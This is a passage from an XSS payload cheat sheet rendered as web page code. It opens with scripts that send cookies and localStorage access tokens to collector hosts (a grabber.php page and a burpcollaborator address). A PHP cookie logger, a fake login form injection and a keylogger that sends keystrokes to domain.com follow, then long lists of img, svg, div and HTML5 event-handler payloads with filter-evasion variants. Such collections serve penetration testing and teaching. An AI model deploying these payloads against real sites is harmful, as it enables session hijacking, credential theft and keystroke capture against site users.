<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="o">=</span><span class="s1">&#39;http://localhost/XSS/grabber.php?c=&#39;</span><span class="o">+</span><span class="nx">localStorage</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="s1">&#39;access_token&#39;</span><span class="p">)&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
<a id="__codelineno-0-3" name="__codelineno-0-3" href="#__codelineno-0-3"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="ow">new</span><span class="w"> </span><span class="nx">Image</span><span class="p">().</span><span class="nx">src</span><span class="o">=</span><span class="s2">&quot;http://localhost/cookie.php?c=&quot;</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">;&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
<a id="__codelineno-0-4" name="__codelineno-0-4" href="#__codelineno-0-4"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="ow">new</span><span class="w"> </span><span class="nx">Image</span><span class="p">().</span><span class="nx">src</span><span class="o">=</span><span class="s2">&quot;http://localhost/cookie.php?c=&quot;</span><span class="o">+</span><span class="nx">localStorage</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="s1">&#39;access_token&#39;</span><span class="p">);&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
</code></pre></div>
<p>Write the collected data into a file.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="cp">&lt;?php</span>
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a><span class="nv">$cookie</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;c&#39;</span><span class="p">];</span>
<a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a><span class="nv">$fp</span> <span class="o">=</span> <span class="nb">fopen</span><span class="p">(</span><span class="s1">&#39;cookies.txt&#39;</span><span class="p">,</span> <span class="s1">&#39;a+&#39;</span><span class="p">);</span>
<a id="__codelineno-1-4" name="__codelineno-1-4" href="#__codelineno-1-4"></a><span class="nb">fwrite</span><span class="p">(</span><span class="nv">$fp</span><span class="p">,</span> <span class="s1">&#39;Cookie:&#39;</span> <span class="o">.</span><span class="nv">$cookie</span><span class="o">.</span><span class="s2">&quot;</span><span class="se">\r\n</span><span class="s2">&quot;</span><span class="p">);</span>
<a id="__codelineno-1-5" name="__codelineno-1-5" href="#__codelineno-1-5"></a><span class="nb">fclose</span><span class="p">(</span><span class="nv">$fp</span><span class="p">);</span>
<a id="__codelineno-1-6" name="__codelineno-1-6" href="#__codelineno-1-6"></a><span class="cp">?&gt;</span>
</code></pre></div>
<h3 id="cors">CORS</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a><span class="w"> </span><span class="nx">fetch</span><span class="p">(</span><span class="s1">&#39;https://&lt;SESSION&gt;.burpcollaborator.net&#39;</span><span class="p">,</span><span class="w"> </span><span class="p">{</span>
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="w"> </span><span class="nx">method</span><span class="o">:</span><span class="w"> </span><span class="s1">&#39;POST&#39;</span><span class="p">,</span>
<a id="__codelineno-2-4" name="__codelineno-2-4" href="#__codelineno-2-4"></a><span class="w"> </span><span class="nx">mode</span><span class="o">:</span><span class="w"> </span><span class="s1">&#39;no-cors&#39;</span><span class="p">,</span>
<a id="__codelineno-2-5" name="__codelineno-2-5" href="#__codelineno-2-5"></a><span class="w"> </span><span class="nx">body</span><span class="o">:</span><span class="w"> </span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span>
<a id="__codelineno-2-6" name="__codelineno-2-6" href="#__codelineno-2-6"></a><span class="w"> </span><span class="p">});</span>
<a id="__codelineno-2-7" name="__codelineno-2-7" href="#__codelineno-2-7"></a><span class="p">&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
</code></pre></div>
<h3 id="ui-redressing">UI Redressing</h3>
<p>Leverage the XSS to modify the HTML content of the page in order to display a fake login form.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span>
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a><span class="nx">history</span><span class="p">.</span><span class="nx">replaceState</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w"> </span><span class="s1">&#39;../../../login&#39;</span><span class="p">);</span>
<a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a><span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">innerHTML</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">&quot;&lt;/br&gt;&lt;/br&gt;&lt;/br&gt;&lt;/br&gt;&lt;/br&gt;&lt;h1&gt;Please login to continue&lt;/h1&gt;&lt;form&gt;Username: &lt;input type=&#39;text&#39;&gt;Password: &lt;input type=&#39;password&#39;&gt;&lt;/form&gt;&lt;input value=&#39;submit&#39; type=&#39;submit&#39;&gt;&quot;</span>
<a id="__codelineno-3-4" name="__codelineno-3-4" href="#__codelineno-3-4"></a><span class="p">&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
</code></pre></div>
<h3 id="javascript-keylogger">Javascript Keylogger</h3>
<p>Another way to collect sensitive data is to set a javascript keylogger.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="o">&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="s1">&#39;document.onkeypress=function(e){fetch(&quot;http://domain.com?k=&quot;+String.fromCharCode(e.which))},this.remove();&#39;</span><span class="o">&gt;</span>
</code></pre></div>
<h3 id="other-ways">Other Ways</h3>
<p>More exploits at <a href="http://www.xss-payloads.com/payloads-list.html?a#category=all">http://www.xss-payloads.com/payloads-list.html?a#category=all</a>:</p>
<ul>
<li><a href="https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/">Taking screenshots using XSS and the HTML5 Canvas</a></li>
<li><a href="http://www.gnucitizen.org/blog/javascript-port-scanner/">JavaScript Port Scanner</a></li>
<li><a href="http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html">Network Scanner</a></li>
<li><a href="http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html">.NET Shell execution</a></li>
<li><a href="http://www.xss-payloads.com/payloads/scripts/redirectform.js.html">Redirect Form</a></li>
<li><a href="http://www.xss-payloads.com/payloads/scripts/playmusic.js.html">Play Music</a></li>
</ul>
<h2 id="identify-an-xss-endpoint">Identify an XSS Endpoint</h2>
<p>This payload opens the debugger in the developer console rather than triggering a popup alert box.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="k">debugger</span><span class="p">;</span><span class="o">&lt;</span><span class="err">/script&gt;</span>
</code></pre></div>
<p>Modern applications with content hosting can use <a href="https://security.googleblog.com/2012/08/content-hosting-for-modern-web.html">sandbox domains</a></p>
<blockquote>
<p>to safely host various types of user-generated content. Many of these sandboxes are specifically meant to isolate user-uploaded HTML, JavaScript, or Flash applets and make sure that they can't access any user data.</p>
</blockquote>
<p>For this reason, it's better to use <code>alert(document.domain)</code> or <code>alert(window.origin)</code> rather than <code>alert(1)</code> as default XSS payload in order to know in which scope the XSS is actually executing.</p>
<p>Better payload replacing <code>&lt;script&gt;alert(1)&lt;/script&gt;</code>:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">domain</span><span class="p">.</span><span class="nx">concat</span><span class="p">(</span><span class="s2">&quot;\n&quot;</span><span class="p">).</span><span class="nx">concat</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">origin</span><span class="p">))&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
</code></pre></div>
<p>While <code>alert()</code> is nice for reflected XSS it can quickly become a burden for stored XSS because it requires to close the popup for each execution, so <code>console.log()</code> can be used instead to display a message in the console of the developer console (doesn't require any interaction).</p>
<p>Example:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">&quot;Test XSS from the search bar of page XYZ\n&quot;</span><span class="p">.</span><span class="nx">concat</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">domain</span><span class="p">).</span><span class="nx">concat</span><span class="p">(</span><span class="s2">&quot;\n&quot;</span><span class="p">).</span><span class="nx">concat</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">origin</span><span class="p">))&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
</code></pre></div>
<p>References:</p>
<ul>
<li><a href="https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain">Google Bughunter University - XSS in sandbox domains</a></li>
<li><a href="https://www.youtube.com/watch?v=KHwVjzWei1c">LiveOverflow Video - DO NOT USE alert(1) for XSS</a></li>
<li><a href="https://liveoverflow.com/do-not-use-alert-1-in-xss/">LiveOverflow blog post - DO NOT USE alert(1) for XSS</a></li>
</ul>
<h3 id="tools">Tools</h3>
<p>Most tools are also suitable for blind XSS attacks:</p>
<ul>
<li><a href="https://github.com/s0md3v/XSStrike">XSSStrike</a>: Very popular but unfortunately not very well maintained</li>
<li><a href="https://github.com/epsylon/xsser">xsser</a>: Utilizes a headless browser to detect XSS vulnerabilities</li>
<li><a href="https://github.com/hahwul/dalfox">Dalfox</a>: Extensive functionality and extremely fast thanks to the implementation in Go</li>
<li><a href="https://github.com/hahwul/XSpear">XSpear</a>: Similar to Dalfox but based on Ruby</li>
<li><a href="https://github.com/fcavallarin/domdig">domdig</a>: Headless Chrome XSS Tester</li>
</ul>
<h2 id="xss-in-htmlapplications">XSS in HTML/Applications</h2>
<h3 id="common-payloads">Common Payloads</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="c1">// Basic payload</span>
<a id="__codelineno-8-2" name="__codelineno-8-2" href="#__codelineno-8-2"></a><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;XSS&#39;</span><span class="p">)</span><span class="o">&lt;</span><span class="err">/script&gt;</span>
<a id="__codelineno-8-3" name="__codelineno-8-3" href="#__codelineno-8-3"></a><span class="o">&lt;</span><span class="nx">scr</span><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">ipt</span><span class="o">&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;XSS&#39;</span><span class="p">)</span><span class="o">&lt;</span><span class="err">/scr&lt;script&gt;ipt&gt;</span>
<a id="__codelineno-8-4" name="__codelineno-8-4" href="#__codelineno-8-4"></a><span class="s2">&quot;&gt;&lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;</span>
<a id="__codelineno-8-5" name="__codelineno-8-5" href="#__codelineno-8-5"></a><span class="s2">&quot;</span><span class="o">&gt;&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mf">88</span><span class="p">,</span><span class="mf">83</span><span class="p">,</span><span class="mf">83</span><span class="p">))</span><span class="o">&lt;</span><span class="err">/script&gt;</span>
<a id="__codelineno-8-6" name="__codelineno-8-6" href="#__codelineno-8-6"></a><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">\u0061lert</span><span class="p">(</span><span class="s1">&#39;22&#39;</span><span class="p">)</span><span class="o">&lt;</span><span class="err">/script&gt;</span>
<a id="__codelineno-8-7" name="__codelineno-8-7" href="#__codelineno-8-7"></a><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nb">eval</span><span class="p">(</span><span class="s1">&#39;\x61lert(\&#39;33\&#39;)&#39;</span><span class="p">)</span><span class="o">&lt;</span><span class="err">/script&gt;</span>
<a id="__codelineno-8-8" name="__codelineno-8-8" href="#__codelineno-8-8"></a><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nb">eval</span><span class="p">(</span><span class="mf">8680439.</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mf">30</span><span class="p">))(</span><span class="mf">983801.</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mf">36</span><span class="p">))</span><span class="o">&lt;</span><span class="sr">/script&gt; /</span><span class="o">/</span><span class="nb">parseInt</span><span class="p">(</span><span class="s2">&quot;confirm&quot;</span><span class="p">,</span><span class="mf">30</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mf">8680439</span><span class="w"> </span><span class="o">&amp;&amp;</span><span class="w"> </span><span class="mf">8680439.</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mf">30</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s2">&quot;confirm&quot;</span>
<a id="__codelineno-8-9" name="__codelineno-8-9" href="#__codelineno-8-9"></a><span class="o">&lt;</span><span class="nx">object</span><span class="o">/</span><span class="nx">data</span><span class="o">=</span><span class="s2">&quot;jav&amp;#x61;sc&amp;#x72;ipt&amp;#x3a;al&amp;#x65;rt&amp;#x28;23&amp;#x29;&quot;</span><span class="o">&gt;</span>
<a id="__codelineno-8-10" name="__codelineno-8-10" href="#__codelineno-8-10"></a>
<a id="__codelineno-8-11" name="__codelineno-8-11" href="#__codelineno-8-11"></a><span class="c1">// Img payload</span>
<a id="__codelineno-8-12" name="__codelineno-8-12" href="#__codelineno-8-12"></a><span class="o">&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;XSS&#39;</span><span class="p">);</span><span class="o">&gt;</span>
<a id="__codelineno-8-13" name="__codelineno-8-13" href="#__codelineno-8-13"></a><span class="o">&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;XSS&#39;</span><span class="p">)</span><span class="c1">//</span>
<a id="__codelineno-8-14" name="__codelineno-8-14" href="#__codelineno-8-14"></a><span class="o">&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mf">88</span><span class="p">,</span><span class="mf">83</span><span class="p">,</span><span class="mf">83</span><span class="p">));</span><span class="o">&gt;</span>
<a id="__codelineno-8-15" name="__codelineno-8-15" href="#__codelineno-8-15"></a><span class="o">&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="w"> </span><span class="nx">oneonerrorrror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mf">88</span><span class="p">,</span><span class="mf">83</span><span class="p">,</span><span class="mf">83</span><span class="p">));</span><span class="o">&gt;</span>
<a id="__codelineno-8-16" name="__codelineno-8-16" href="#__codelineno-8-16"></a><span class="o">&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="o">:</span><span class="nx">alert</span><span class="p">(</span><span class="nx">alt</span><span class="p">)</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="nb">eval</span><span class="p">(</span><span class="nx">src</span><span class="p">)</span><span class="w"> </span><span class="nx">alt</span><span class="o">=</span><span class="nx">xss</span><span class="o">&gt;</span>
<a id="__codelineno-8-17" name="__codelineno-8-17" href="#__codelineno-8-17"></a><span class="s2">&quot;&gt;&lt;img src=x onerror=alert(&#39;XSS&#39;);&gt;</span>
<a id="__codelineno-8-18" name="__codelineno-8-18" href="#__codelineno-8-18"></a><span class="s2">&quot;</span><span class="o">&gt;&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mf">88</span><span class="p">,</span><span class="mf">83</span><span class="p">,</span><span class="mf">83</span><span class="p">));</span><span class="o">&gt;</span>
<a id="__codelineno-8-19" name="__codelineno-8-19" href="#__codelineno-8-19"></a><span class="o">&lt;&gt;&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="mf">1</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-8-20" name="__codelineno-8-20" href="#__codelineno-8-20"></a>
<a id="__codelineno-8-21" name="__codelineno-8-21" href="#__codelineno-8-21"></a><span class="c1">// Svg payload</span>
<a id="__codelineno-8-22" name="__codelineno-8-22" href="#__codelineno-8-22"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="w"> </span><span class="nx">onload</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-8-23" name="__codelineno-8-23" href="#__codelineno-8-23"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">/</span><span class="nx">onload</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;XSS&#39;</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-8-24" name="__codelineno-8-24" href="#__codelineno-8-24"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="w"> </span><span class="nx">onload</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="c1">//</span>
<a id="__codelineno-8-25" name="__codelineno-8-25" href="#__codelineno-8-25"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">/</span><span class="nx">onload</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mf">88</span><span class="p">,</span><span class="mf">83</span><span class="p">,</span><span class="mf">83</span><span class="p">))</span><span class="o">&gt;</span>
<a id="__codelineno-8-26" name="__codelineno-8-26" href="#__codelineno-8-26"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="w"> </span><span class="nx">id</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="w"> </span><span class="nx">onload</span><span class="o">=</span><span class="nb">eval</span><span class="p">(</span><span class="nx">id</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-8-27" name="__codelineno-8-27" href="#__codelineno-8-27"></a><span class="s2">&quot;&gt;&lt;svg/onload=alert(String.fromCharCode(88,83,83))&gt;</span>
<a id="__codelineno-8-28" name="__codelineno-8-28" href="#__codelineno-8-28"></a><span class="s2">&quot;</span><span class="o">&gt;&lt;</span><span class="nx">svg</span><span class="o">/</span><span class="nx">onload</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="sr">/XSS/</span><span class="p">)</span>
<a id="__codelineno-8-29" name="__codelineno-8-29" href="#__codelineno-8-29"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">&gt;&lt;</span><span class="nx">script</span><span class="w"> </span><span class="nx">href</span><span class="o">=</span><span class="nx">data</span><span class="o">:</span><span class="p">,</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="w"> </span><span class="o">/&gt;</span><span class="p">(</span><span class="sb">`Firefox`</span><span class="w"> </span><span class="nx">is</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">only</span><span class="w"> </span><span class="nx">browser</span><span class="w"> </span><span class="nx">which</span><span class="w"> </span><span class="nx">allows</span><span class="w"> </span><span class="nx">self</span><span class="w"> </span><span class="nx">closing</span><span class="w"> </span><span class="nx">script</span><span class="p">)</span>
<a id="__codelineno-8-30" name="__codelineno-8-30" href="#__codelineno-8-30"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">&gt;&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;33&#39;</span><span class="p">)</span>
<a id="__codelineno-8-31" name="__codelineno-8-31" href="#__codelineno-8-31"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">&gt;&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">alert</span><span class="o">&amp;</span><span class="nx">lpar</span><span class="p">;</span><span class="s1">&#39;33&#39;</span><span class="o">&amp;</span><span class="nx">rpar</span><span class="p">;</span>
<a id="__codelineno-8-32" name="__codelineno-8-32" href="#__codelineno-8-32"></a>
<a id="__codelineno-8-33" name="__codelineno-8-33" href="#__codelineno-8-33"></a><span class="c1">// Div payload</span>
<a id="__codelineno-8-34" name="__codelineno-8-34" href="#__codelineno-8-34"></a><span class="o">&lt;</span><span class="nx">div</span><span class="w"> </span><span class="nx">onpointerover</span><span class="o">=</span><span class="s2">&quot;alert(45)&quot;</span><span class="o">&gt;</span><span class="nx">MOVE</span><span class="w"> </span><span class="nx">HERE</span><span class="o">&lt;</span><span class="err">/div&gt;</span>
<a id="__codelineno-8-35" name="__codelineno-8-35" href="#__codelineno-8-35"></a><span class="o">&lt;</span><span class="nx">div</span><span class="w"> </span><span class="nx">onpointerdown</span><span class="o">=</span><span class="s2">&quot;alert(45)&quot;</span><span class="o">&gt;</span><span class="nx">MOVE</span><span class="w"> </span><span class="nx">HERE</span><span class="o">&lt;</span><span class="err">/div&gt;</span>
<a id="__codelineno-8-36" name="__codelineno-8-36" href="#__codelineno-8-36"></a><span class="o">&lt;</span><span class="nx">div</span><span class="w"> </span><span class="nx">onpointerenter</span><span class="o">=</span><span class="s2">&quot;alert(45)&quot;</span><span class="o">&gt;</span><span class="nx">MOVE</span><span class="w"> </span><span class="nx">HERE</span><span class="o">&lt;</span><span class="err">/div&gt;</span>
<a id="__codelineno-8-37" name="__codelineno-8-37" href="#__codelineno-8-37"></a><span class="o">&lt;</span><span class="nx">div</span><span class="w"> </span><span class="nx">onpointerleave</span><span class="o">=</span><span class="s2">&quot;alert(45)&quot;</span><span class="o">&gt;</span><span class="nx">MOVE</span><span class="w"> </span><span class="nx">HERE</span><span class="o">&lt;</span><span class="err">/div&gt;</span>
<a id="__codelineno-8-38" name="__codelineno-8-38" href="#__codelineno-8-38"></a><span class="o">&lt;</span><span class="nx">div</span><span class="w"> </span><span class="nx">onpointermove</span><span class="o">=</span><span class="s2">&quot;alert(45)&quot;</span><span class="o">&gt;</span><span class="nx">MOVE</span><span class="w"> </span><span class="nx">HERE</span><span class="o">&lt;</span><span class="err">/div&gt;</span>
<a id="__codelineno-8-39" name="__codelineno-8-39" href="#__codelineno-8-39"></a><span class="o">&lt;</span><span class="nx">div</span><span class="w"> </span><span class="nx">onpointerout</span><span class="o">=</span><span class="s2">&quot;alert(45)&quot;</span><span class="o">&gt;</span><span class="nx">MOVE</span><span class="w"> </span><span class="nx">HERE</span><span class="o">&lt;</span><span class="err">/div&gt;</span>
<a id="__codelineno-8-40" name="__codelineno-8-40" href="#__codelineno-8-40"></a><span class="o">&lt;</span><span class="nx">div</span><span class="w"> </span><span class="nx">onpointerup</span><span class="o">=</span><span class="s2">&quot;alert(45)&quot;</span><span class="o">&gt;</span><span class="nx">MOVE</span><span class="w"> </span><span class="nx">HERE</span><span class="o">&lt;</span><span class="err">/div&gt;</span>
</code></pre></div>
<h3 id="xss-using-html5-tags">XSS using HTML5 tags</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a><span class="o">&lt;</span><span class="nx">body</span><span class="w"> </span><span class="nx">onload</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="sr">/XSS/</span><span class="p">.</span><span class="nx">source</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-2" name="__codelineno-9-2" href="#__codelineno-9-2"></a><span class="o">&lt;</span><span class="nx">input</span><span class="w"> </span><span class="nx">autofocus</span><span class="w"> </span><span class="nx">onfocus</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-3" name="__codelineno-9-3" href="#__codelineno-9-3"></a><span class="o">&lt;</span><span class="nx">select</span><span class="w"> </span><span class="nx">autofocus</span><span class="w"> </span><span class="nx">onfocus</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-4" name="__codelineno-9-4" href="#__codelineno-9-4"></a><span class="o">&lt;</span><span class="nx">textarea</span><span class="w"> </span><span class="nx">autofocus</span><span class="w"> </span><span class="nx">onfocus</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-5" name="__codelineno-9-5" href="#__codelineno-9-5"></a><span class="o">&lt;</span><span class="nx">keygen</span><span class="w"> </span><span class="nx">autofocus</span><span class="w"> </span><span class="nx">onfocus</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-6" name="__codelineno-9-6" href="#__codelineno-9-6"></a><span class="o">&lt;</span><span class="nx">video</span><span class="o">/</span><span class="nx">poster</span><span class="o">/</span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-7" name="__codelineno-9-7" href="#__codelineno-9-7"></a><span class="o">&lt;</span><span class="nx">video</span><span class="o">&gt;&lt;</span><span class="nx">source</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="s2">&quot;javascript:alert(1)&quot;</span><span class="o">&gt;</span>
<a id="__codelineno-9-8" name="__codelineno-9-8" href="#__codelineno-9-8"></a><span class="o">&lt;</span><span class="nx">video</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">_</span><span class="w"> </span><span class="nx">onloadstart</span><span class="o">=</span><span class="s2">&quot;alert(1)&quot;</span><span class="o">&gt;</span>
<a id="__codelineno-9-9" name="__codelineno-9-9" href="#__codelineno-9-9"></a><span class="o">&lt;</span><span class="nx">details</span><span class="o">/</span><span class="nx">open</span><span class="o">/</span><span class="nx">ontoggle</span><span class="o">=</span><span class="s2">&quot;alert`1`&quot;</span><span class="o">&gt;</span>
<a id="__codelineno-9-10" name="__codelineno-9-10" href="#__codelineno-9-10"></a><span class="o">&lt;</span><span class="nx">audio</span><span class="w"> </span><span class="nx">src</span><span class="w"> </span><span class="nx">onloadstart</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-11" name="__codelineno-9-11" href="#__codelineno-9-11"></a><span class="o">&lt;</span><span class="nx">marquee</span><span class="w"> </span><span class="nx">onstart</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-12" name="__codelineno-9-12" href="#__codelineno-9-12"></a><span class="o">&lt;</span><span class="nx">meter</span><span class="w"> </span><span class="nx">value</span><span class="o">=</span><span class="mf">2</span><span class="w"> </span><span class="nx">min</span><span class="o">=</span><span class="mf">0</span><span class="w"> </span><span class="nx">max</span><span class="o">=</span><span class="mf">10</span><span class="w"> </span><span class="nx">onmouseover</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span><span class="mf">2</span><span class="w"> </span><span class="nx">out</span><span class="w"> </span><span class="k">of</span><span class="w"> </span><span class="mf">10</span><span class="o">&lt;</span><span class="err">/meter&gt;</span>
<a id="__codelineno-9-13" name="__codelineno-9-13" href="#__codelineno-9-13"></a>
